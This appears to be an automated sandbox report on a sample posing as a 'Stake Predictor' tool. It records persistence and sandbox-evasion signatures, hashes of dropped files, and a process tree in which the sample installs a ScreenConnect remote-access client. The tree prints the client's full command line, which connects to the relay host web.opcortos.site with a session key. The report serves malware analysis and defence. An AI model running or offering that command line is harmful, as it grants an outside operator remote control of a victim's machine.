Overview

overview

8

Static

static

3

Stake Pred...ke.exe

windows10-2004-x64

8

Stake Pred...er.exe

windows10-2004-x64

1

Stake Pred...64.exe

windows10-2004-x64

8

Analysis

  • max time kernel
    92s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/11/2024, 03:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Stake Predictor V 6.5/data/x64.exe

  • Size

    5.4MB

  • MD5

    04b62df7bc57f5f089d2b7da540f1cd4

  • SHA1

    585f45877c422b8172c2b8acb5c2e99e2b9e71e0

  • SHA256

    937489b1fb9ec5d89ec2515603e629dd3d0afca7b3042d6d2b748ddb31582f73

  • SHA512

    164dbc64230f7f2824ab16ebab10ce36bfbd798493884b612186f072fae57b30c3983188caff3118e7a6224cabba1d8091edcf19b21c295aac1a9e2d934e9c65

  • SSDEEP

    98304:tas6efPFqDexXV1lknvGDm/0yxQQ8zCAvvPIQG:IfefPFNXDkimcyRjA

Score
8/10
discoverypersistenceprivilege_escalation

Malware Config

Signatures

  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

    persistenceprivilege_escalation
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 3 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

    persistenceprivilege_escalation
  • Drops file in Program Files directory 17 IoCs
  • Drops file in Windows directory 13 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 22 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 37 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\Stake Predictor V 6.5\data\x64.exe
    "C:\Users\Admin\AppData\Local\Temp\Stake Predictor V 6.5\data\x64.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2168
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.6.9056\3a4594764213d345\ScreenConnect.ClientSetup.msi"
      2⤵
      • Enumerates connected drives
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2316
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Boot or Logon Autostart Execution: Authentication Package
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3440
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 30E6364F26DC128D7E2DA74AD2BA8F06 C
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4832
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI8A8D.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240618234 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
        3⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:1180
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:4852
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 33E42201A008A303A1A700FAEA7279AB
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2008
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 170E080938C3C878A8A4B54E77A630D2 E Global\MSI0000
        2⤵
        • Drops file in Windows directory
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:3616
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Checks SCSI registry key(s)
      PID:2528
    • C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.ClientService.exe
      "C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=web.opcortos.site&p=8041&s=14e15d71-e436-435b-9198-d25c3622d2db&k=BgIAAACkAABSU0ExAAgAAAEAAQAtKNB5tpHnGBbFtYd9fkfV2WUqUQKKmkZmbMjL8aKUACJuhQ8STY08Xf%2bOJx7SJ7RwXLAvhPqyzVjP1CSvZS%2frjLfXD5nrfVqZtGMjASTw%2biE901OStQsrrIfJ5D0L8P1V7w%2f4LHwUtjjrLVXdErXroZkAxmZiK2qvprJ%2f5GKGTniKrQGtBXA8u7ZB0wKk00k9aua2YntrIGl%2b9lnsMx62%2b80B9WWngJSC3kdtAuXXJKiL4xMkgsGgbS553qbbC7AeaR%2bMprbBtBGfTKHjDdDqJU1uRMdn0FIwefRdLN1ZcOof4t37KWYetrpXX4egVMmTn3c2i%2bWMrg3dsBX57%2f%2fD&c=HMOTYIZ&c=&c=&c=&c=&c=&c=&c="
      1⤵
      • Sets service image path in registry
      • Drops file in System32 directory
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4060
      • C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.WindowsClient.exe
        "C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.WindowsClient.exe" "RunRole" "646ebb2c-61f9-4643-9d54-5dacef6311ea" "User"
        2⤵
        • Executes dropped EXE
        PID:3340
      • C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.WindowsClient.exe
        "C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.WindowsClient.exe" "RunRole" "92d35810-ea11-479f-b791-dbbd9a6ce52e" "System"
        2⤵
        • Drops file in System32 directory
        • Executes dropped EXE
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        PID:2292

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Config.Msi\e57d041.rbs
      Filesize

      214KB

      MD5

      3061919d69da24468c929e9cb4551e0a

      SHA1

      d0a869b7c5d361d1e372548d6ba72e81b57a6a7a

      SHA256

      4f00a9487b8d4dd1cab16babd57093a5a36f88bbd4006a6de616c27ace25c931

      SHA512

      191f758c060334b510faa25185eb4928e2d1d1edb777ef301f14489fe81b80abab4a237f316ccfc514ca928ab0e62a2a72d5e32250ed3332f4de4a755433b10c

      Download Submit

    • C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\Client.en-US.resources
      Filesize

      48KB

      MD5

      d524e8e6fd04b097f0401b2b668db303

      SHA1

      9486f89ce4968e03f6dcd082aa2e4c05aef46fcc

      SHA256

      07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4

      SHA512

      e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5

      Download Submit

    • C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\Client.resources
      Filesize

      26KB

      MD5

      5cd580b22da0c33ec6730b10a6c74932

      SHA1

      0b6bded7936178d80841b289769c6ff0c8eead2d

      SHA256

      de185ee5d433e6cfbb2e5fcc903dbd60cc833a3ca5299f2862b253a41e7aa08c

      SHA512

      c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787

      Download Submit

    • C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.Client.dll
      Filesize

      192KB

      MD5

      c51db3c8b94dcf5c6309b8166f8e2596

      SHA1

      81a360a3f97dcbafb92cf78373ac17efdefe60e6

      SHA256

      0b4c3c09b47f7858f85ab9f9f3a64614b83abb3fde673a74f1f9fe50ad246538

      SHA512

      25dc28ab05cbd46c3798c2455c22c9348625a85c77bb2c84d6b3a7e6473c77d795c66d99774158b4941bdc2df77dbab34a59495dc2f0b5f092da118251350856

      Download Submit

    • C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.ClientService.dll
      Filesize

      66KB

      MD5

      3000960a26d58892966a3d7c63f9d4de

      SHA1

      9a80b44fa173dc6b794c7e17c76679168338a9b4

      SHA256

      668d9b50b0792b2aef23947d83b4fc9354f15246c059e4e4b22f9b7d3be16a8d

      SHA512

      579c8dcb5b27f35fdf91901a2e97906ec1298fd2174be0ca328067bc08236046428bd4100fd7f60c17586dfbcfc9c74e0d1234b9bfa8edb40c740a3ae7dcb8ba

      Download Submit

    • C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.ClientService.exe
      Filesize

      93KB

      MD5

      f38350faf2f0535e8cede708069443d2

      SHA1

      092efbd6c8a4672ab13ea9640fcef82f743ef84c

      SHA256

      ca81f3541fffcada43d2b4db74fe433e886b6f3f392717f6975cc13e6a2550bd

      SHA512

      47af8c2e5d45cc9ca166dc6377466da1362f3e8b00a1114fd13be665675024dd90d337dbc62a6fd2600f3959d44b6f7f1da7f13c2390713a854496f529c9bdb7

      Download Submit

    • C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.WindowsAuthenticationPackage.dll
      Filesize

      254KB

      MD5

      5adcb5ae1a1690be69fd22bdf3c2db60

      SHA1

      09a802b06a4387b0f13bf2cda84f53ca5bdc3785

      SHA256

      a5b8f0070201e4f26260af6a25941ea38bd7042aefd48cd68b9acf951fa99ee5

      SHA512

      812be742f26d0c42fdde20ab4a02f1b47389f8d1acaa6a5bb3409ba27c64be444ac06d4129981b48fa02d4c06b526cb5006219541b0786f8f37cf2a183a18a73

      Download Submit

    • C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.WindowsClient.exe
      Filesize

      588KB

      MD5

      81fc731e7e0c45a2e4c4eb24163f016f

      SHA1

      e130fcebd6f69ccbc53ec1ec677892c9216ed0a7

      SHA256

      f8fe864c6a7572308f1f732a3a5fe358bef95f2f1dfdf28ec53bc4aff3fd203f

      SHA512

      5822d02511fada5518d9cf9f7009acda05c008339d7dadcfa13946a880ab182edd14a382eada4e30ac8bf9949ea5047da3f1012531a0cdd53561c728507977dd

      Download Submit

    • C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.WindowsClient.exe.config
      Filesize

      266B

      MD5

      728175e20ffbceb46760bb5e1112f38b

      SHA1

      2421add1f3c9c5ed9c80b339881d08ab10b340e3

      SHA256

      87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077

      SHA512

      fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7

      Download Submit

    • C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\ScreenConnect.WindowsCredentialProvider.dll
      Filesize

      822KB

      MD5

      be74ab7a848a2450a06de33d3026f59e

      SHA1

      21568dcb44df019f9faf049d6676a829323c601e

      SHA256

      7a80e8f654b9ddb15dda59ac404d83dbaf4f6eafafa7ecbefc55506279de553d

      SHA512

      2643d649a642220ceee121038fe24ea0b86305ed8232a7e5440dffc78270e2bda578a619a76c5bb5a5a6fe3d9093e29817c5df6c5dd7a8fbc2832f87aa21f0cc

      Download Submit

    • C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\app.config
      Filesize

      2KB

      MD5

      3ddbb1a9d518424c6423f147a3e910eb

      SHA1

      cfbe6f418ea5a7a72ae62587776611b30073c00a

      SHA256

      4b542deb0b72de93b378a034e5e78bb96cc6b0845ace90dad680781246fd930d

      SHA512

      f6be457c50c37138ea2dbdf0222a345982839b530b89d27f1481ea030c764efc633bd29c234bf30fc505c3dca9a82d357c0cb4b769ddcfbad2fc1d95b9cf8f05

      Download Submit

    • C:\Program Files (x86)\ScreenConnect Client (3a4594764213d345)\system.config
      Filesize

      945B

      MD5

      ae57545efa5155714356568cc3c04316

      SHA1

      cf079c46666973bc6b173bf805b799e28fa38847

      SHA256

      9fd6ed6f009c62f765b42a9e6e68d6148a4855585b13ef168b3ba03960e98b67

      SHA512

      ff8410e72af8891446009bd1a12191fb384051f38c6553741dfcc40c5888fbbb5108d32e23ee9f4c008ded95db7b0db23419549d53b523e4d83e2eab111bce52

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\MSI8A8D.tmp
      Filesize

      1.0MB

      MD5

      921a541e311eea8f78a93ca00eaf88b6

      SHA1

      b73075c68e7dfb021fad4e330cb5243621b0ef97

      SHA256

      30fcade8abc1f24b7200b6ce1e2a574a1bcc5ea3579029370692cadb079d3e86

      SHA512

      47e6563b6c79510f3e87dbebf761a7f7f8135bae19374c5c98ec32a9bbe317c2aaa24d662454ae80d66be14a1562fbb2fe9aea7986b731b968b55c5b66ec2e08

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\MSI8A8D.tmp-\Microsoft.Deployment.WindowsInstaller.dll
      Filesize

      172KB

      MD5

      5ef88919012e4a3d8a1e2955dc8c8d81

      SHA1

      c0cfb830b8f1d990e3836e0bcc786e7972c9ed62

      SHA256

      3e54286e348ebd3d70eaed8174cca500455c3e098cdd1fccb167bc43d93db29d

      SHA512

      4544565b7d69761f9b4532cc85e7c654e591b2264eb8da28e60a058151030b53a99d1b2833f11bfc8acc837eecc44a7d0dbd8bc7af97fc0e0f4938c43f9c2684

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\MSI8A8D.tmp-\ScreenConnect.Core.dll
      Filesize

      536KB

      MD5

      558cb5d03851deadb7570c827eb6275c

      SHA1

      b2586fb22e7ad195bc9325458249abdf103eac58

      SHA256

      fb4c4e7321f373aa0e3b1ad2682c1ec12c697e4d0576ee25a3aff513a8455850

      SHA512

      418a33b93065e2a73f852ca80534b7445ca0a9e25912e15a829e595f27e4f81f01740431e076cff18d008060bde5a6be2c3db6ed9d91fa5b2daf55fd69ce4a8b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\MSI8A8D.tmp-\ScreenConnect.InstallerActions.dll
      Filesize

      11KB

      MD5

      c84ca90e0ca2998e188669d540c2cbfc

      SHA1

      29e5fca4b478892945e98fd3b9404e9cd8ebefbe

      SHA256

      30b4af80db63fecccebdd656dbde61b091bc4c1b1100cb067ccd66b3c90b1855

      SHA512

      d905689489847a584669d9c46d58e4bea09be44666d531350f7d726009800b9ef3bf1de3e5e3bc0c9ad86436e4d39d8531b3019de59c95f7b980ace8dbf9bf56

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\MSI8A8D.tmp-\ScreenConnect.Windows.dll
      Filesize

      1.6MB

      MD5

      9e36cd54844d017e550812e21a0698f0

      SHA1

      cbd097a5bdabfa667fec06a93dda506e5cf8384c

      SHA256

      cd9f1be2621e298f1d39824646c41c693a4384ab7a050930b857daa269796aaf

      SHA512

      49ca83c01bb44efccfc8d047941713add7fb9e57093435b04674eb6eb115eb97620f4d0cb20fb89ab2b7e3dd6e5f011e46dcedd9e9bc4b0e082aeb6f0e6d7450

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.6.9056\3a4594764213d345\ScreenConnect.ClientSetup.msi
      Filesize

      9.5MB

      MD5

      521441c47c9536491ce10af85935ad52

      SHA1

      fdeb31e54fb48b2f7bdc74ec8627e3a1e376ea06

      SHA256

      c8726e89b4a9cd1a937fd6224114b7091652db76650477215e7518dbe8d4d4ea

      SHA512

      73e91446341721131b3a5f4f18f999ec3bff32a5e06311e2ca42b301b05c39c2ca456cda630ace69b06a7b971b72a521f52f527688743903b959f891acf0a005

      Download Submit

    • C:\Windows\Installer\MSID189.tmp
      Filesize

      202KB

      MD5

      ba84dd4e0c1408828ccc1de09f585eda

      SHA1

      e8e10065d479f8f591b9885ea8487bc673301298

      SHA256

      3cff4ac91288a0ff0c13278e73b282a64e83d089c5a61a45d483194ab336b852

      SHA512

      7a38418f6ee8dbc66fab2cd5ad8e033e761912efc465daa484858d451da4b8576079fe90fd3b6640410edc8b3cac31c57719898134f246f4000d60a252d88290

      Download Submit

    • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
      Filesize

      24.1MB

      MD5

      1f3263278ba04d4c1b2b2c5139631100

      SHA1

      c64dc5e293817decd2003e1aa2d25e49266a826b

      SHA256

      fde5658acaae0b818ee65470b88acfca58dd35aa5b12ba4341cc95fe5d9bd721

      SHA512

      843cdf3fbe6f7c55a5a3f81ae66776f88750f3a1704d1b0887667dfb7fce76e2db163db2952cd1d199b518723da7c1db0c054e05ba1e5b89b5f178d5a37730e5

      Download Submit

    • \??\Volume{ff55cfe6-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{608ad69c-223a-474e-a0e4-e361cc9b7d02}_OnDiskSnapshotProp
      Filesize

      6KB

      MD5

      0ae472147301dbf613981c1f90b5bff4

      SHA1

      bb94e8d774aa5cf7df0759a9ffc9670411c0e1f5

      SHA256

      fa8a3acb340a74bb2df5b054a196d347b22d9d5a559bf4c496545de314626415

      SHA512

      1bfc4020a745beab423dee9077a55dae41021d60eddf39fc59dfb95f5e580d6ff76a565976567f73c183b05f6bbe4f93a562743e67be67bf617d0e6b0b49d5c3

      Download Submit

    • memory/1180-40-0x00000000048A0000-0x000000000492C000-memory.dmp

      Filesize

      560KB

      Download

    • memory/1180-36-0x0000000004800000-0x000000000480A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/1180-32-0x00000000047D0000-0x00000000047FE000-memory.dmp

      Filesize

      184KB

      Download

    • memory/1180-44-0x0000000004AE0000-0x0000000004C8A000-memory.dmp

      Filesize

      1.7MB

      Download

    • memory/2168-8-0x00000000065D0000-0x0000000006B74000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/2168-7-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2168-1-0x0000000001AA0000-0x0000000001AA8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2168-4-0x0000000005930000-0x00000000059BC000-memory.dmp

      Filesize

      560KB

      Download

    • memory/2168-3-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2168-5-0x00000000059C0000-0x00000000059E2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2168-9-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2168-6-0x0000000005A40000-0x0000000005BEA000-memory.dmp

      Filesize

      1.7MB

      Download

    • memory/2168-0-0x000000007501E000-0x000000007501F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2168-12-0x0000000075010000-0x00000000757C0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/2168-2-0x0000000005D30000-0x0000000006020000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2292-152-0x00000000024A0000-0x00000000024E1000-memory.dmp

      Filesize

      260KB

      Download

    • memory/3340-147-0x000000001C1C0000-0x000000001C36A000-memory.dmp

      Filesize

      1.7MB

      Download

    • memory/3340-142-0x0000000000FA0000-0x0000000001036000-memory.dmp

      Filesize

      600KB

      Download

    • memory/3340-143-0x0000000003130000-0x0000000003166000-memory.dmp

      Filesize

      216KB

      Download

    • memory/3340-146-0x000000001BF80000-0x000000001C00C000-memory.dmp

      Filesize

      560KB

      Download

    • memory/3340-148-0x000000001D420000-0x000000001D5A6000-memory.dmp

      Filesize

      1.5MB

      Download

    • memory/3340-149-0x00000000017F0000-0x0000000001808000-memory.dmp

      Filesize

      96KB

      Download

    • memory/3340-150-0x0000000001830000-0x0000000001848000-memory.dmp

      Filesize

      96KB

      Download

    • memory/4060-130-0x0000000003EF0000-0x0000000003F26000-memory.dmp

      Filesize

      216KB

      Download

    • memory/4060-131-0x0000000004030000-0x00000000040C2000-memory.dmp

      Filesize

      584KB

      Download

    • memory/4060-135-0x0000000004210000-0x00000000042E2000-memory.dmp

      Filesize

      840KB

      Download

    • memory/4060-133-0x0000000003F90000-0x0000000003FD1000-memory.dmp

      Filesize

      260KB

      Download

    • memory/4060-126-0x0000000003F40000-0x0000000003F90000-memory.dmp

      Filesize

      320KB

      Download

    • memory/4060-101-0x00000000039C0000-0x00000000039D8000-memory.dmp

      Filesize

      96KB

      Download